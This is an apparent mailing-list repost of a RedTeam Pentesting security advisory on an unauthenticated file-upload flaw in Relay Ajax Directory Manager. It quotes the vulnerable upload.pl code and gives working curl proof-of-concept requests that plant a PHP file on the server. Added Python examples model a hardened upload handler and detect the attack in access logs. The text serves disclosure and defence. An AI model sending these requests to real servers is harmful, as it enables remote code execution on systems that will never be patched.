Bugtraq: [RT-SA-2016-005] Unauthenticated File Upload in Relay Ajax Directory Manager may Lead to Remote Command Execution

Advisory: Unauthenticated File Upload in Relay Ajax Directory Manager
may Lead to Remote Command Execution

A vulnerability within the Relay Ajax Directory Manager web application
allows unauthenticated attackers to upload arbitrary files to the web
server running the web application.

Details
=======

Product: Relay Ajax Directory Manager
Affected Versions: relayb01-071706, 1.5.1 and 1.5.3 were tested; other
                   versions are most likely vulnerable as well.
Fixed Versions: -
Vulnerability Type: Unauthenticated File Upload
Security Risk: high
Vendor URL: http://ift.tt/1Pfk2TM
Vendor Status: decided not to fix, project is unmaintained
Advisory URL: http://ift.tt/1sIvGMP
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://ift.tt/1jQGmEN

Introduction
============

Relay Ajax Directory Manager[1], also known as relay[2], is a web-based
file manager. It allows files and folders to be uploaded via drag and
drop and provides several other features, such as a thumbnail preview
for images and basic user authentication functionality.

More Details
============

While the web application itself is mostly written in PHP, it also
utilizes the Perl script 'upload.pl' for handling uploads initiated by
the user.

Uploading is a multi-step process:

1. The user initiates a multipart/form-data upload request through the
   web application. This request is sent to the Perl script, which
   handles all of the following steps.

2. A temporary file containing the entire request (including headers)
   is created. This temporary file is named partly after the first URL
   parameter, as shown in the following listing.

3. The headers and the POST body of the request are parsed and filtered
   to determine the final filename.

4. The upload is written to the final destination.

5. A file containing statistics about the upload process is written.

During steps 2-5, no checks are performed to ensure that the user is
authenticated at all.

The following listing shows parts of the upload Perl script:

-- upload.pl -----------------------------------------------------------
[...]
@qstring=split(/&/,$ENV{'QUERY_STRING'});
$sessionid = $qstring[0];
[...]
$tmpfile = "$uploadsFolder\\temp_$sessionid";
$statsfile = "$uploadsFolder\\stats_$sessionid.txt";
$tmpfilepre= "$uploadsFolder\\$sessionid\_";
[...]
open(FILE,">","$tmpfilepre$filename") or print "can't open temp file";
binmode(FILE);
print FILE $filedata;
close FILE;
[...]
------------------------------------------------------------------------

Here, the first URL parameter is stored in the variable $sessionid
without any validation. Its content is then used as a prefix for the
names of the temporary file, the statistics file and the uploaded file
itself before the data is written, so an attacker controls both the
prefix and (via the 'filename' field) the remainder of the final name.
Given the configured upload directory, which is 'uploads/' by default,
the URL of the uploaded file can be determined.

The web application usually requires users to be authenticated before
any actions (e.g. uploading) can be performed, but since the Perl script
is not secured by any form of authentication, it can be accessed by
anyone. If the web server does not prohibit the execution of e.g. PHP
files within the upload directory, arbitrary PHP code can be executed
by uploading the respective files to the web server.
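The following Python model is added here as an example; it is not code
from the advisory or from Relay itself. It replays the naming logic of
steps 2-5 above exactly as the listing shows it, next to a hardened
variant that checks the session, the filename and the resulting path.
The upload folder name 'uploads', the session-id format and the
server-side set of valid sessions are assumptions; Relay's own session
handling is not part of the listing.

```python
"""Vulnerable vs. hardened file naming for an upload.pl-style handler.

Added example, not code from the advisory or from Relay.  Assumptions:
the upload folder is 'uploads' (Relay's default) and the application
keeps a server-side set of valid session ids the hardened variant can
consult."""
import os
import re

UPLOADS = "uploads"                        # assumption: Relay's default folder
SESSION_RE = re.compile(r"[A-Za-z0-9]{16,64}")    # assumed session-id format
FILENAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,128}")
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif", ".pdf", ".txt"}
# Matched anywhere in the name, not only at the end: Apache evaluates every
# extension of "shell.php.jpg", so an inner ".php" still gets executed.
SCRIPT_MARKERS = (".php", ".phtml", ".phar", ".pl", ".cgi", ".htaccess")


def vulnerable_targets(query_string: str, form_filename: str) -> dict:
    """What upload.pl does: the first query-string parameter becomes
    $sessionid and is used, unchecked, as a prefix for every file written.
    The caller therefore chooses the extension of the temp file as well."""
    sessionid = query_string.split("&")[0]
    return {
        "temp": os.path.join(UPLOADS, f"temp_{sessionid}"),       # raw request
        "stats": os.path.join(UPLOADS, f"stats_{sessionid}.txt"),
        "final": os.path.join(UPLOADS, f"{sessionid}_{form_filename}"),
    }


def hardened_target(query_string: str, form_filename: str,
                    valid_sessions: set) -> tuple:
    """Hardened variant: returns (True, final_path) or (False, reason)."""
    sessionid = query_string.split("&")[0]
    # 1. authentication: the id must be well-formed and known server-side
    if not SESSION_RE.fullmatch(sessionid) or sessionid not in valid_sessions:
        return False, "no authenticated session"
    # 2. filename: basename only, conservative character set, no dotfiles
    name = os.path.basename(form_filename.replace("\\", "/"))
    if not FILENAME_RE.fullmatch(name) or name.startswith("."):
        return False, "bad filename"
    lowered = name.lower()
    if (os.path.splitext(lowered)[1] not in ALLOWED_EXT
            or any(marker in lowered for marker in SCRIPT_MARKERS)):
        return False, "extension not allowed"
    # 3. containment: the final path must stay inside the upload folder
    final = os.path.join(UPLOADS, f"{sessionid}_{name}")
    root = os.path.realpath(UPLOADS)
    if os.path.commonpath([root, os.path.realpath(final)]) != root:
        return False, "path escapes upload folder"
    return True, final


if __name__ == "__main__":
    sid = "c0ffee" * 5 + "42"               # constructed 32-character session id
    print(vulnerable_targets("redteam", "info.php"))       # attacker-named .php
    print(hardened_target("redteam", "info.php", {sid}))   # rejected: no session
    print(hardened_target(sid, "shell.php.jpg", {sid}))    # rejected: inner .php
    print(hardened_target(sid, "photo.jpg", {sid}))        # accepted
```

The hardened variant fails closed on every input the listing accepts
blindly: an unknown or malformed session id, a name with a path
component, a dotfile such as .htaccess, and any script extension,
including one hidden before an allowed suffix.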

Proof of Concept
================

In general, the Perl script expects a request containing
multipart/form-data. In this case, the name specified in the 'filename'
field is prefixed with the first URL parameter ('redteam' in the
following example). Using the command line HTTP client curl, a request
like the following can be sent to a vulnerable installation of Relay
Ajax Directory Manager in order to upload a PHP script which invokes
the function 'phpinfo()'. The URL is that of 'upload.pl' with the chosen
prefix as its first query-string parameter:

curl -i -s -k -X 'POST' \
  -H 'Content-Type: multipart/form-data; boundary=----------------------------83ff53821b7c' \
  --data-binary $'------------------------------83ff53821b7c\x0d\x0a'$'Content-Disposition: form-data; filename=\"info.php\"\x0d\x0a'$'Content-Type: application/octet-stream\x0d\x0a\x0d\x0a'$'<?php phpinfo(); ?>\x0d\x0a'$'------------------------------83ff53821b7c--' \
  'http://ift.tt/1XLM9M1'

The server responds with HTTP status code 200 indicating a successful
upload:

HTTP/1.1 200 OK
Date: Mon, 09 May 2016 11:09:50 GMT
Server: Apache/2.4.18 (Debian)
Content-Length: 0
Content-Type: text/plain

Such a request would yield the following files in the web server's
upload directory upon success:

$ ls relay-1-5-3/uploads/
redteam_info.php  stats_redteam.txt  temp_redteam

The file temp_redteam contains the complete multipart/form-data request
as it was sent to the upload.pl script, and redteam_info.php contains
the file body extracted from it:

$ cat relay-1-5-3/uploads/redteam_info.php
<?php phpinfo(); ?>

Requesting this file with the URL http://ift.tt/1sIvGwd will then yield
the server's output of the phpinfo() function.

However, since the entire content of the upload request is saved to a
temporary file, a regular POST request containing only the code to be
executed is sufficient to exploit this vulnerability: choosing
'redteam.php' as the first URL parameter makes the temporary file
itself end in '.php'. The following invocation of curl uploads the same
PHP script which invokes the function 'phpinfo()':

$ curl --silent --include --data '<?php phpinfo(); ?>' 'http://ift.tt/1TTSAtJ'

In the server's upload directory, the file temp_redteam.php contains
the data that was sent to the upload.pl script:

$ ls relay-1-5-3/uploads/
stats_redteam.php.txt  temp_redteam.php

$ cat relay-1-5-3/uploads/temp_redteam.php
<?php phpinfo(); ?>

Requesting this file with the URL http://ift.tt/1sIvXz6 will again
yield the server's output of the phpinfo() function.

Using either of these methods, an attacker is able to upload arbitrary
files to the affected web server, e.g. in order to easily execute PHP
code with the privileges of the web server process.
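Both proofs of concept leave a characteristic trace in the web server's
access log: a POST to upload.pl whose first query-string parameter is
attacker-chosen, followed by a GET of a script file out of the upload
folder. The following Python detection is added as an example and is
not part of the advisory; it runs over constructed Apache combined-log
lines that mirror the two requests above. The '/relay-1-5-3/' path
prefix, the client addresses and the log format are assumptions.

```python
"""Flag exploitation attempts against upload.pl in Apache access logs.

Added example, not from the advisory.  The log lines are constructed for
the example; the /relay-1-5-3/ prefix is an assumption."""
import re
from urllib.parse import unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
SCRIPT_EXT = (".php", ".phtml", ".phar", ".pl", ".cgi")

# Constructed sample: the two PoC sequences from one client, and a
# legitimate-looking upload of an image from another.
SAMPLE_LOG = """\
203.0.113.7 - - [09/May/2016:11:09:50 +0000] "POST /relay-1-5-3/upload.pl?redteam HTTP/1.1" 200 0
203.0.113.7 - - [09/May/2016:11:09:51 +0000] "GET /relay-1-5-3/uploads/redteam_info.php HTTP/1.1" 200 53212
203.0.113.7 - - [09/May/2016:11:10:03 +0000] "POST /relay-1-5-3/upload.pl?redteam.php HTTP/1.1" 200 0
203.0.113.7 - - [09/May/2016:11:10:04 +0000] "GET /relay-1-5-3/uploads/temp_redteam.php HTTP/1.1" 200 53212
198.51.100.2 - - [09/May/2016:11:12:00 +0000] "GET /relay-1-5-3/index.php HTTP/1.1" 200 1840
198.51.100.2 - - [09/May/2016:11:12:30 +0000] "POST /relay-1-5-3/upload.pl?5f1c9ab2e77d4c03&x=1 HTTP/1.1" 200 0
198.51.100.2 - - [09/May/2016:11:12:31 +0000] "GET /relay-1-5-3/uploads/5f1c9ab2e77d4c03_photo.jpg HTTP/1.1" 200 9120
"""


def analyse(lines):
    """Return (severity, client, message) tuples.

    Every POST to upload.pl is reported, because the script accepts them
    without authentication.  A session id carrying a script extension, or
    a script fetched back out of the upload folder with status 200, is
    rated high; any other upload.pl call is rated medium for review."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        path, query = url.path, unquote(url.query)
        if m["method"] == "POST" and path.endswith("/upload.pl"):
            sid = query.split("&")[0]          # what upload.pl uses as $sessionid
            sev = "high" if sid.lower().endswith(SCRIPT_EXT) else "medium"
            findings.append((sev, m["ip"], f"upload.pl called with sessionid={sid!r}"))
        elif (m["method"] == "GET" and "/uploads/" in path
              and path.lower().endswith(SCRIPT_EXT) and m["status"] == "200"):
            findings.append(("high", m["ip"], f"script served from upload folder: {path}"))
    return findings


def suspicious_clients(lines):
    """Clients with at least one high-severity finding."""
    return sorted({ip for sev, ip, _ in analyse(lines) if sev == "high"})


if __name__ == "__main__":
    for finding in analyse(SAMPLE_LOG.splitlines()):
        print(*finding)
    print("suspicious:", suspicious_clients(SAMPLE_LOG.splitlines()))
```

The medium findings are deliberate: because upload.pl performs no
authentication, a POST to it from a client that never logged in is the
actual signal, and an access log alone cannot tell the two apart, so
every call is surfaced for correlation with the application's session
log.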

Workaround
==========

One possible workaround is to prevent the execution of files in the
upload directory and to deliver them as attachments instead. With
Apache and mod_php, for example, 'php_flag engine off' or
'RemoveHandler .php .phtml' in a .htaccess file for the upload
directory (which requires a suitable AllowOverride setting) disables
execution, and 'Header set Content-Disposition attachment' forces a
download; with PHP-FPM, 'php_flag' has no effect and the SetHandler
mapping for '.php' has to be overridden for that directory instead.
Note that this only limits the impact: upload.pl still accepts
unauthenticated uploads, and the attacker still chooses the file name.

Fix
===

None.

Security Risk
=============

This vulnerability allows unauthenticated attackers to upload arbitrary
files to the affected system. In the web server's and project's default
configuration it is very likely that this may be used to execute
arbitrary commands with the privileges of the web server process. This
is possible without authentication, thereby providing no barrier for
attackers. It is therefore rated as a high risk. Since this software is
quite old and not well maintained, it is likely that additional
vulnerabilities exist. However, this was not further evaluated.

Timeline
========

2015-11-19 Vulnerability discovered
2016-04-07 Customer approved disclosure of vulnerability
2016-05-12 Developers contacted, project is no longer maintained
2016-05-31 Advisory published

References
==========

[1] http://ift.tt/1Pfk2TM
[2] http://ift.tt/1pE6Ji8

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
http://ift.tt/1ixScMF

--
RedTeam Pentesting GmbH                 Tel.: +49 241 510081-0
Dennewartstr. 25-27                     Fax : +49 241 510081-99
52068 Aachen                            http://ift.tt/1ixScMF
Germany                                 Commercial register: Aachen HRB 14004
Managing directors: Patrick Hof, Jens Liebchen

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQEcBAABCgAGBQJXTXsaAAoJENG/HXWsgFSuDzQIAL7ObaccoLbd5IrHqXnC52BY
ksNZ0opOAQbd42IZQ8o8y9Y762hSDIZtrDmkNVo1UzFC68Fv7fBlG8ERYXuzQRnF
FIlSM5KNmBt/eFV/hc/6qdpzRnLTTq5/x0owqpArNv33i702LeNGOH56a4F3bTt3
T0aaaPbbZ5mXMsZQ3IDNpDjLqutc6Ziz7BvVfyQttT9U6RvSSs54G4deQaGvdn4Y
7qHu3H93nnx0R8naAx5qDqmJwNWEbLKoKDg2kuk9sLlMD/AoXojzD6tavthGmHnL
fatIbeeu9VtXPwpXjGzoSEW9BgjoYqRTRZg9jg4A+xgqbqx34CE+iobgdztZnfQ=
=z9dg
-----END PGP SIGNATURE-----



from SecurityFocus Vulnerabilities http://ift.tt/1UagkHs